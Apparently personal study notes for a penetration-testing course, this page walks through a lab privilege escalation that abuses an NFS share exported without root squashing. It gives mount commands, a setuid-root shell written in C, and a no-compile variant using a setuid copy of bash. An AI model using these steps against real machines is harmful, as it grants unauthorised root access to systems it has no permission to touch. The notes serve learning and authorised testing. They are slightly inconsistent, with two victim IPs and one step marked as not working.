Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

NFS Root Squashing

check:

cat /etc/exports
image

this means that the /tmp folder is shareable and can be mounted so we can mount it!

how?

on Kali:

showmount -e 10.10.231.117

this is the victim machine IP

image

we can mount /tmp

make directory:

mkdir /tmp/mountme
sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme

On Victim: (This isn’t working, alternative at the bottom)

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/x.c
gcc x.c -o x

compile:

gcc /tmp/mountme/x.c -o /tmp/mountme/x

add perms:

sudo chown root:root /tmp/mountme/x
sudo chmod +s /tmp/mountme/x

On the ssh tmp folder:

/tmp/x

Alternative (bash, no compile):

on victim:

cp /bin/bash /tmp/bash

on Kali:

sudo mount -v -o rw,vers=3 10.10.221.115:/tmp /tmp/mountme
sudo chown root:root /tmp/mountme/bash
sudo chmod +s /tmp/mountme/bash

On Victim:

/tmp/bash -p